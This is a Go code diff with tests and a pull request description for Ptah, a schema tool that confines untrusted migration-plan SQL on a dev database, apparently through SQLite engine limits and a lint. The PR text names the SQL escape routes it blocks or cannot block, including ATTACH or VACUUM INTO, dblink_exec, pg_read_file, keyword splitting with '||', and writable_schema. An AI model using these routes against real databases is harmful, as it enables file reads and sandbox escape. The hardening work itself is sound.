-			return rehearseOnPreparedDev(ctx, session, current, txMode, statements)
-		})
-	}
-	return rehearseOnPreparedDev(ctx, devConn, current, txMode, statements)
+	// The dev database executes these statements for real, and they came from
+	// outside the operator's project, so the session carries every engine-level
+	// restriction its dialect supports. Taking the session through
+	// WithUntrustedSQLSession is what makes an unrestricted rehearsal
+	// impossible to write; the lint above is only a lint.
+	return devConn.WithUntrustedSQLSession(ctx, func(session *dbschema.DatabaseConnection) error {
+		return rehearseOnPreparedDev(ctx, session, current, txMode, statements)
+	})
 }
+
+// checkPlanStatements is the escape lint as used by the rehearsal core. It is
+// a variable so a test can neutralize the lint and prove that the engine-level
+// restrictions — not the lint — are what stop an escape.
+var checkPlanStatements = CheckPlanStatementsSandboxable
 
 func rehearseOnPreparedDev(
 	ctx context.Context,

--- a/internal/atlasschema/simulate.go
+++ b/internal/atlasschema/simulate.go
@@ -30,8 +30,11 @@ type SimulationError struct {
 }
 
 func (e *SimulationError) Error() string {
+	// The claim is narrow on purpose: this command did not apply the plan to
+	// the target. What the rehearsed SQL did on the dev database — or through
+	// it — is not something this message can speak for.
 	return fmt.Sprintf(
-		"dev database simulation failed during %s: %v; the target database was left unchanged",
+		"dev database simulation failed during %s: %v; the plan was not applied to the target database",
 		e.Stage, e.Err,
 	)
 }
@@ -143,7 +146,35 @@ func connectSimulationDev(
 // introspected current schema on it, and executes the ordered statements
 // under txMode — the shared rehearsal core of the pre-apply simulation and
 // the plan-file desired-state verification.
+//
+// Every caller reaches the dev database through here, so this is where the
+// escape lint runs: a dev database executes the statements for real, whether
+// they came from a plan file or from a freshly computed apply.
 func rehearseStatementsOnDev(
+	ctx context.Context,
+	devConn *dbschema.DatabaseConnection,
+	current *dbschematypes.DBSchema,
+	txMode migrator.MigrationTxMode,
+	statements []string,
+) error {
+	if err := CheckPlanStatementsSandboxable(statements, devConn.Info().Dialect); err != nil {
+		return err
+	}
+	// A SQLite dev database gets real engine-level restrictions for the whole
+	// rehearsal, which is what actually contains the ephemeral dev database
+	// Ptah creates itself. The lint above is only a lint.
+	if platform.NormalizeDialect(devConn.Info().Dialect) == platform.SQLite {
+		return devConn.WithSession(ctx, func(session *dbschema.DatabaseConnection) error {
+			if err := session.RestrictSQLiteSession(ctx); err != nil {
+				return fmt.Errorf("restrict dev database session: %w", err)
+			}
+			return rehearseOnPreparedDev(ctx, session, current, txMode, statements)
+		})
+	}
+	return rehearseOnPreparedDev(ctx, devConn, current, txMode, statements)
+}
+
+func rehearseOnPreparedDev(
 	ctx context.Context,
 	devConn *dbschema.DatabaseConnection,
 	current *dbschematypes.DBSchema,

--- a/internal/atlasschema/simulate_test.go
+++ b/internal/atlasschema/simulate_test.go
@@ -120,7 +120,7 @@ func TestSimulateOnDev_FailedSimulationLeavesTargetUnchanged(t *testing.T) {
 	c.Assert(err, qt.ErrorAs, &simulationErr)
 	c.Assert(simulationErr.Stage, qt.Equals, "plan")
 	c.Assert(atlasschema.IsSimulationFailure(err), qt.IsTrue)
-	c.Assert(err, qt.ErrorMatches, `(?s)dev database simulation failed during plan: .*sim_existing.*; the target database was left unchanged`)
+	c.Assert(err, qt.ErrorMatches, `(?s)dev database simulation failed during plan: .*sim_existing.*; the plan was not applied to the target database`)
 	// The failed rehearsal must not have touched the target.
 	c.Assert(sqliteTableExists(c, dbPath, "sim_existing"), qt.IsTrue)
 	c.Assert(sqliteTableExists(c, dbPath, "sim_added"), qt.IsFalse)

--- a/internal/atlasschema/testdata/atlas.plan.hcl
+++ b/internal/atlasschema/testdata/atlas.plan.hcl
@@ -1,0 +1,17 @@
+plan "20260801102801" {
+  from      = "2Avyplv6jw8kAsH/g2YFPkfnp+UNBpomMXPUl/4R4+Q="
+  to        = "YEugbm2aJqmXFA8dDrzmqLPC4tiNUrXe6YCrvazKOiY="
+  migration = <<-SQL
+  -- Add column "email" to table: "users"
+  ALTER TABLE `users` ADD COLUMN `email` text NULL;
+  -- Create "posts" table
+  CREATE TABLE `posts` (
+    `id` integer NOT NULL PRIMARY KEY AUTOINCREMENT,
+    `user_id` integer NOT NULL,
+    `title` text NOT NULL,
+    CONSTRAINT `fk_posts_user` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON UPDATE NO ACTION ON DELETE NO ACTION
+  );
+  -- Create index "idx_posts_user_id" to table: "posts"
+  CREATE INDEX `idx_posts_user_id` ON `posts` (`user_id`);
+  SQL
+}

--- a/internal/atlasschema/testdata/ptah-written-golden.plan.hcl
+++ b/internal/atlasschema/testdata/ptah-written-golden.plan.hcl
@@ -1,0 +1,14 @@
+plan "plan_6d78a9ec5390" {
+  from      = "sha256:2ef81def17f625ec4fc7927e136e516022e244ab587bb702b5b71d38b05cbe27"
+  to        = "sha256:c4fc6302f3cc08997acbb8b8d6ae52eabcbd9c6604a9835305035b1522e03b23"
+  migration = <<-SQL
+  CREATE TABLE "posts" (
+    "id" integer PRIMARY KEY AUTOINCREMENT,
+    "user_id" integer NOT NULL,
+    "title" TEXT NOT NULL,
+    CONSTRAINT "fk_posts_user" FOREIGN KEY ("user_id") REFERENCES "users" ("id")
+  );
+  ALTER TABLE "users" ADD COLUMN "email" TEXT;
+  CREATE INDEX IF NOT EXISTS "idx_posts_user_id" ON "posts" ("user_id");
+  SQL
+}

--- a/internal/dbschema/sqlite/restrict.go
+++ b/internal/dbschema/sqlite/restrict.go
@@ -5,6 +5,7 @@ import (
 	"database/sql"
 	"errors"
 	"fmt"
+	"strings"
 
 	sqlitedriver "modernc.org/sqlite"
 	sqlite3 "modernc.org/sqlite/lib"
@@ -14,22 +15,34 @@ import (
 // collide with a schema a caller might legitimately attach.
 const probeSchemaName = "ptah_restriction_probe"
 
+// attachRefusalMarker is the text SQLite returns when SQLITE_LIMIT_ATTACHED
+// forbids an ATTACH. Matching it is what distinguishes "the restriction is
+// working" from "the ATTACH failed for some other reason".
+const attachRefusalMarker = "too many attached databases"
+
 // RestrictSession applies engine-level restrictions to one pinned SQLite
 // session and then proves they are live.
 //
 // It sets SQLITE_LIMIT_ATTACHED to 0, which makes the engine itself refuse
 // ATTACH and DETACH — and, because SQLite implements it by attaching,
-// VACUUM INTO as well. That closes the paths by which SQL executed on a
-// throwaway dev database could reach another database file or write to an
-// arbitrary filesystem path. Loading native extensions is already refused by
-// the driver's default configuration.
+// VACUUM INTO as well. So SQL executed on the session cannot reach another
+// database file, and cannot write a database copy to an arbitrary path.
+// Loading native extensions is already refused by the driver's default
+// configuration.
+//
+// What it does NOT cover: the storage-directory pragmas
+// (temp_store_directory, data_store_directory) still execute, and
+// writable_schema is still settable. Those remain the lint's problem, not the
+// engine's.
 //
 // The limit is a property of the physical connection, so the caller must pass
 // a session that is pinned for the whole unit of work; a pooled connection
 // would leave sibling connections unrestricted. Because that is easy to get
 // wrong and the failure would be silent, this function verifies the
-// restriction by attempting an ATTACH and requiring the engine to refuse it.
-// A restriction that did not take effect is an error, never a warning.
+// restriction by attempting an ATTACH and requiring the engine to refuse it
+// with the specific limit error. Any other outcome — the ATTACH succeeding,
+// or failing for an unrelated reason that would equally hide a missing
+// restriction — is an error, never a warning.
 func RestrictSession(ctx context.Context, session *sql.Conn) error {
 	if session == nil {
 		return errors.New("sqlite session restriction requires a pinned session")
@@ -37,21 +50,36 @@ func RestrictSession(ctx context.Context, session *sql.Conn) error {
 	if _, err := sqlitedriver.Limit(session, sqlite3.SQLITE_LIMIT_ATTACHED, 0); err != nil {
 		return fmt.Errorf("restrict sqlite session: set attached-database limit: %w", err)
 	}
-	return verifyAttachRefused(ctx, session)
+	return verifyRestriction(ctx, session)
 }
 
+// verifyRestriction is the confirmation step, kept as a variable so a test can
+// prove RestrictSession actually consults it. Without that, dropping the
+// verification would be invisible: on a session where the limit did take
+// effect, verifying and not verifying look identical.
+var verifyRestriction = verifyAttachRefused
+
 // verifyAttachRefused fails unless the engine refuses an ATTACH on this
-// session. A successful ATTACH means the restriction is not in force, so the
-// probe database is detached again and the caller is told to stop.
+// session with the attached-database limit error. An ATTACH that succeeds
+// means the restriction is not in force, so the probe database is detached
+// again and the caller is told to stop; an ATTACH that fails for some other
+// reason proves nothing about the restriction and is treated the same way.
 func verifyAttachRefused(ctx context.Context, session *sql.Conn) error {
 	_, err := session.ExecContext(ctx, fmt.Sprintf("ATTACH DATABASE ':memory:' AS %s", probeSchemaName))
-	if err != nil {
+	switch {
+	case err == nil:
+		if _, detachErr := session.ExecContext(ctx, "DETACH DATABASE "+probeSchemaName); detachErr != nil {
+			return fmt.Errorf(
+				"sqlite session restriction did not take effect: ATTACH still succeeds, and detaching the probe database failed: %w",
+				detachErr)
+		}
+		return errors.New("sqlite session restriction did not take effect: ATTACH still succeeds on the restricted session")
+	case strings.Contains(err.Error(), attachRefusalMarker):
 		return nil
-	}
-	if _, detachErr := session.ExecContext(ctx, "DETACH DATABASE "+probeSchemaName); detachErr != nil {
+	default:
 		return fmt.Errorf(
-			"sqlite session restriction did not take effect: ATTACH still succeeds, and detaching the probe database failed: %w",
-			detachErr)
+			"sqlite session restriction could not be confirmed: the verification ATTACH failed without the expected %q error, "+
+				"so the restriction cannot be assumed to be in force: %w",
+			attachRefusalMarker, err)
 	}
-	return errors.New("sqlite session restriction did not take effect: ATTACH still succeeds on the restricted session")
 }

--- a/internal/dbschema/sqlite/restrict.go
+++ b/internal/dbschema/sqlite/restrict.go
@@ -1,0 +1,57 @@
+package sqlite
+
+import (
+	"context"
+	"database/sql"
+	"errors"
+	"fmt"
+
+	sqlitedriver "modernc.org/sqlite"
+	sqlite3 "modernc.org/sqlite/lib"
+)
+
+// probeSchemaName is the alias used by the self-check ATTACH. It must not
+// collide with a schema a caller might legitimately attach.
+const probeSchemaName = "ptah_restriction_probe"
+
+// RestrictSession applies engine-level restrictions to one pinned SQLite
+// session and then proves they are live.
+//
+// It sets SQLITE_LIMIT_ATTACHED to 0, which makes the engine itself refuse
+// ATTACH and DETACH — and, because SQLite implements it by attaching,
+// VACUUM INTO as well. That closes the paths by which SQL executed on a
+// throwaway dev database could reach another database file or write to an
+// arbitrary filesystem path. Loading native extensions is already refused by
+// the driver's default configuration.
+//
+// The limit is a property of the physical connection, so the caller must pass
+// a session that is pinned for the whole unit of work; a pooled connection
+// would leave sibling connections unrestricted. Because that is easy to get
+// wrong and the failure would be silent, this function verifies the
+// restriction by attempting an ATTACH and requiring the engine to refuse it.
+// A restriction that did not take effect is an error, never a warning.
+func RestrictSession(ctx context.Context, session *sql.Conn) error {
+	if session == nil {
+		return errors.New("sqlite session restriction requires a pinned session")
+	}
+	if _, err := sqlitedriver.Limit(session, sqlite3.SQLITE_LIMIT_ATTACHED, 0); err != nil {
+		return fmt.Errorf("restrict sqlite session: set attached-database limit: %w", err)
+	}
+	return verifyAttachRefused(ctx, session)
+}
+
+// verifyAttachRefused fails unless the engine refuses an ATTACH on this
+// session. A successful ATTACH means the restriction is not in force, so the
+// probe database is detached again and the caller is told to stop.
+func verifyAttachRefused(ctx context.Context, session *sql.Conn) error {
+	_, err := session.ExecContext(ctx, fmt.Sprintf("ATTACH DATABASE ':memory:' AS %s", probeSchemaName))
+	if err != nil {
+		return nil
+	}
+	if _, detachErr := session.ExecContext(ctx, "DETACH DATABASE "+probeSchemaName); detachErr != nil {
+		return fmt.Errorf(
+			"sqlite session restriction did not take effect: ATTACH still succeeds, and detaching the probe database failed: %w",
+			detachErr)
+	}
+	return errors.New("sqlite session restriction did not take effect: ATTACH still succeeds on the restricted session")
+}

--- a/internal/dbschema/sqlite/restrict_internal_test.go
+++ b/internal/dbschema/sqlite/restrict_internal_test.go
@@ -1,0 +1,93 @@
+package sqlite
+
+// White-box testing required: verifyAttachRefused is the fail-closed half of
+// the restriction — the part that turns "we called Limit" into "the engine
+// really refuses ATTACH". Its unhappy branches are unreachable through the
+// exported API, because RestrictSession applies the limit first, so they are
+// exercised here directly.
+
+import (
+	"context"
+	"database/sql"
+	"errors"
+	"path/filepath"
+	"testing"
+
+	qt "github.com/frankban/quicktest"
+	sqlitedriver "modernc.org/sqlite"
+	sqlite3 "modernc.org/sqlite/lib"
+)
+
+func sqliteSession(c *qt.C) (*sql.Conn, *sql.DB) {
+	c.Helper()
+	db, err := sql.Open("sqlite", filepath.Join(c.TB.TempDir(), "probe.db"))
+	c.Assert(err, qt.IsNil)
+	db.SetMaxOpenConns(1)
+	session, err := db.Conn(context.Background())
+	c.Assert(err, qt.IsNil)
+	return session, db
+}
+
+func TestVerifyAttachRefusedAcceptsTheLimitError(t *testing.T) {
+	c := qt.New(t)
+	session, db := sqliteSession(c)
+	defer db.Close()
+	_, err := sqlitedriver.Limit(session, sqlite3.SQLITE_LIMIT_ATTACHED, 0)
+	c.Assert(err, qt.IsNil)
+
+	c.Assert(verifyAttachRefused(context.Background(), session), qt.IsNil)
+}
+
+func TestVerifyAttachRefusedRejectsAnUnrestrictedSession(t *testing.T) {
+	c := qt.New(t)
+	session, db := sqliteSession(c)
+	defer db.Close()
+
+	// No limit applied: the ATTACH succeeds, which means the restriction is
+	// not in force and the caller must not proceed.
+	err := verifyAttachRefused(context.Background(), session)
+
+	c.Assert(err, qt.ErrorMatches,
+		`sqlite session restriction did not take effect: ATTACH still succeeds on the restricted session`)
+}
+
+func TestVerifyAttachRefusedRejectsAnUnrelatedFailure(t *testing.T) {
+	c := qt.New(t)
+	session, db := sqliteSession(c)
+	c.Assert(session.Close(), qt.IsNil)
+	defer db.Close()
+
+	// The ATTACH fails, but not because of the attached-database limit. A
+	// failure for any other reason proves nothing about the restriction, so it
+	// must not be read as success.
+	err := verifyAttachRefused(context.Background(), session)
+
+	c.Assert(err, qt.ErrorMatches,
+		`sqlite session restriction could not be confirmed: the verification ATTACH failed without the expected "too many attached databases" error.*`)
+}
+
+func TestRestrictSessionRequiresASession(t *testing.T) {
+	c := qt.New(t)
+
+	c.Assert(RestrictSession(context.Background(), nil), qt.ErrorMatches,
+		`sqlite session restriction requires a pinned session`)
+}
+
+// TestRestrictSessionConsultsTheVerification pins that applying the limit is
+// not the whole job: RestrictSession must confirm the restriction took effect
+// and propagate a failed confirmation. On a session where the limit did work,
+// verifying and skipping verification are indistinguishable, so the check is
+// made observable here.
+func TestRestrictSessionConsultsTheVerification(t *testing.T) {
+	c := qt.New(t)
+	session, db := sqliteSession(c)
+	defer db.Close()
+	sentinel := errors.New("verification refused this session")
+	original := verifyRestriction
+	verifyRestriction = func(context.Context, *sql.Conn) error { return sentinel }
+	c.Cleanup(func() { verifyRestriction = original })
+
+	err := RestrictSession(context.Background(), session)
+
+	c.Assert(errors.Is(err, sentinel), qt.IsTrue, qt.Commentf("err=%v", err))
+}

--- a/internal/dbschema/sqlite/restrict_internal_test.go
+++ b/internal/dbschema/sqlite/restrict_internal_test.go
@@ -11,6 +11,7 @@ import (
 	"database/sql"
 	"errors"
 	"path/filepath"
+	"reflect"
 	"testing"
 
 	qt "github.com/frankban/quicktest"
@@ -73,6 +74,17 @@ func TestRestrictSessionRequiresASession(t *testing.T) {
 		`sqlite session restriction requires a pinned session`)
 }
 
+// TestVerifyRestrictionDefaultsToTheAttachProbe pins what the seam is bound
+// to. Without this, rebinding verifyRestriction to a no-op would satisfy every
+// other test: they prove RestrictSession consults *a* hook, not that the hook
+// is the ATTACH probe that makes the restriction real.
+func TestVerifyRestrictionDefaultsToTheAttachProbe(t *testing.T) {
+	c := qt.New(t)
+
+	c.Assert(reflect.ValueOf(verifyRestriction).Pointer(), qt.Equals,
+		reflect.ValueOf(verifyAttachRefused).Pointer())
+}
+
 // TestRestrictSessionConsultsTheVerification pins that applying the limit is
 // not the whole job: RestrictSession must confirm the restriction took effect
 // and propagate a failed confirmation. On a session where the limit did work,
@@ -89,5 +101,5 @@ func TestRestrictSessionConsultsTheVerification(t *testing.T) {
 
 	err := RestrictSession(context.Background(), session)
 
-	c.Assert(errors.Is(err, sentinel), qt.IsTrue, qt.Commentf("err=%v", err))
+	c.Assert(err, qt.ErrorIs, sentinel)
 }


### PR DESCRIPTION
Closes #958. Refs #951.

Plan files were mutually unreadable with Atlas in both directions (measured 2026-08-01; fixtures preserved as testdata). Per the drop-in-for-Pro principle, the compat tree adopts Atlas's `.plan.hcl` format and verifies foreign plans by replaying them on a dev database.

## What this does

**Read.** `apply --plan` accepts both formats, detected by content (BOM tolerated). Atlas-format plans require `--to` exactly like the official binary (`the flag "to" is required to verify the provided plan`, verbatim), because their base64 hashes have no local recipe; they are verified by replaying on a dev database from the target's current schema and requiring the reached state to equal `--to` before the target is touched. SQLite targets get a restricted ephemeral dev database; other dialects require `--dev-url`. The plan **format** decides whether the replay runs — never the fingerprint shape, which is public and forgeable. A flag-free post-apply end-state check runs whenever a desired state is available, and the whole verification also runs under `--dry-run`. One dialect-aware statement list feeds display, policy, lint, rehearsal, and execution, so what is verified is what runs. JSON plans keep the fingerprint staleness contract unchanged.

**Write.** `schema plan` saves the Atlas `.plan.hcl` shape by default — byte-identical to the campaign's mechanical conversion (golden test), structurally identical to Atlas's own artifact (shape test), with an Atlas-style UTC-timestamp name. A `.json` output path keeps the native format_version-1 JSON plan. Native `ptah` verbs are unchanged.

**Written `.plan.hcl` fields.** `from`/`to` carry Ptah's own `sha256:` fingerprints — the official binary parses the file and reaches its hash-verification stage, but cannot verify values it did not compute (measured, both directions). Content the heredoc cannot carry verbatim (bare `SQL` delimiter line, `${`/`%{`, CR, whitespace-only line, NUL, invalid UTF-8) is refused rather than silently rewritten. A plan computed with `--exclude` refuses the HCL shape, since the format cannot record the patterns. Reader-derived severity/`Destructive` are advisory only, documented in code.

**CLI contract** (per `commands.log`): `plan` accepts `--auto-approve`; `plan` without `--save`/`--output`/`--dry-run` prints to stdout; `apply --plan` combines with `--to`; `--dev-url` requires `--to`.

## Security model: enforce where possible, lint where not

A dev database executes plan SQL for real, and a lexical deny-list cannot be a containment boundary — string concatenation alone defeats any scanner. So the problem is split by **who chose the database**:

- **SQLite dev databases** (the ephemeral one Ptah creates, and an operator-supplied SQLite `--dev-url` — the restriction keys on the dev dialect) get **real engine-level enforcement**. `SQLITE_LIMIT_ATTACHED` is set to 0 on the pinned session, so SQLite itself refuses `ATTACH`, `DETACH`, and `VACUUM INTO`; extensions cannot be loaded. The restriction is verified in force before any plan SQL runs.
- **Every other dialect** gets the lint and nothing more. The docs say plainly that such a `--dev-url` must be a database you are willing to have a foreign plan file execute arbitrary SQL against.
- **Not covered even on SQLite:** storage-directory pragmas and `writable_schema`. The docs state the consequence — a plan could edit the dev catalog, so the converges-to-`--to` verdict is a good-faith check, not an adversarial one.

`dbschema.DatabaseConnection.WithUntrustedSQLSession` is the one public API added (documented in `docs/public_api.md`, snapshot regenerated). It hands back an already-restricted session, so there is no API through which a caller can obtain an *unrestricted* session for untrusted SQL — the sibling-connection mistake is unrepresentable rather than merely tested-against. The modernc-specific call lives in `internal/dbschema/sqlite`.

## Round 5 — CI fix and three holes

- **qtlint (CI blocker).** `errors.Is` inside `c.Assert` is a qtlint violation, which was failing `ptah-go-lint`. Now `c.Assert(err, qt.ErrorIs, sentinel)`; `go tool qtlint ./...` exits 0.
- **`WithUntrustedSQLSession(ctx, nil)` SIGSEGV'd.** `WithSession`'s nil guard never saw the caller's callback, because the closure passed down is the wrapper's own. It now returns the same error its sibling does.
- **The `||` walk-back was dead code** — the lexer emits `||` as two `|` operator tokens, so `MatchOperatorValue("||")` matched nothing and every concatenated dynamic-executor argument went unscanned, while the comment and the previous PR body both claimed otherwise. Fixed, and pinned in both directions.
- **The verification binding was unpinned** — the seam proved `RestrictSession` calls *a* hook, not that the hook is the ATTACH probe. A binding assertion closes it.
- Stale `RestrictSQLiteSession` comment fixed; the lint-call-site test's pragma now targets an existing directory, so the engine genuinely accepts it and the comment explaining the discriminator is true.

**Correction to a previous claim:** two concat cases I initially wrote as expected-refusals were wrong. When the concatenation splits the **keyword itself** (`'ATT' || 'ACH DATABASE ...'`), no per-fragment scan can reassemble it. Those are now a named limitation test (`TestCheckPlanStatementsSandboxableCannotSeeSplitKeywords`) rather than a claim — this is exactly the limitation that makes the engine-level enforcement, not the lint, the thing carrying the security weight.

### Mutation results this round

| Mutation | Result | Killed by |
|---|---|---|
| `\|\|` walk-back reverted to dead form | RED | 3 concat cases in `...RefusesEscapes` |
| `verifyRestriction` rebound to no-op | RED | `TestVerifyRestrictionDefaultsToTheAttachProbe` |
| nil-callback guard deleted | RED | `TestUntrustedSQLSessionRejectsNilCallback` |

Earlier rounds' six mutations (drop verification, sibling connection, drop restriction, drop either lint call site, `DO` not dynamic, any-error-accepted) remain red.

## Verification

`go vet ./...`, full `go test ./...`, `go tool qtlint ./...`, `golangci-lint` (0 issues on touched packages), `check-test-style.sh`, `check-public-api.sh`, `check-public-api-snapshot.sh`, and the docs builders — all green, rebased onto current master (#968, #964).

Live probes: idempotent `DO` guards reach the dev database instead of being refused; `DO` bodies calling `dblink_exec` still refused; quoted `"pg_read_file"(...)` refused; the ATTACH payload refused by the **engine** with the lint bypassed, victim database untouched; the legitimate oracle plan applies end to end.

## Out of scope

Registry plan verbs (Atlas Cloud) remain CE stubs. The Ptah→Atlas direction stops at best-effort readable files: we cannot make the official binary recompute foreign fingerprints, and that is documented rather than papered over.

## Unrelated issue worth filing

`scripts/check-test-style.sh` line 7 pipes to `rg`; when ripgrep is absent the shell prints `rg: command not found`, the script continues, and it still exits OK — so the testify/assert/require prohibition is **silently skipped**. A missing tool should be a hard error. Not touched here.